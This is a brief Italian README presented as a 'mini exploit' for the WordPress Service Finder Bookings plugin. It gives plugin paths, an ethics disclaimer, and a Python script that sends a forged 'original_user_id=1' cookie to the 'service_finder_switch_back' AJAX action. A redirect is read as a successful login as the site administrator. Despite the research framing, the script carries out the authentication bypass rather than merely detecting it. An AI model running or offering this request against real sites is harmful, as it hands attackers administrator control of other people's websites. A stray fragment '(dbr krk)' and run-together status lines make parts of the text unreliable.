
Un mini exploit per il plugin WP Service Finder -Bookings
Il plugin Service Finder è un sistema di prenotazione e gestione dei servizi per WordPress.
A causa della sua popolarità e complessità, alcune versioni hanno avuto problemi di sicurezza legati a endpoint AJAX non autenticati o a controlli di accesso impropri.
Questo README spiega come i ricercatori possono identificare in modo sicuro le installazioni e seguire pratiche etiche (dbr krk).
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ Disclaimer:
Queste ricerche sono solo a scopo educativo e di ricerca. Non tentare accessi non autorizzati o sfruttamenti.
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399: ✅ VULNERABILE! Reindirizzamento al pannello di amministrazione come ADMIN400-499: ⚠️ Errore del client — la richiesta non era valida o non autorizzata, non vulnerabile